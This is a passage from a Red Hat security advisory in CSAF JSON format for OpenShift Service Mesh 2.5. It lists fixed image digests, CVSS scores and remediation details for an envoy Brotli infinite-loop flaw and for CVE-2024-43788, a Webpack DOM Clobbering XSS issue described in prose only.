"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: Brotli decompressor infinite loop"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
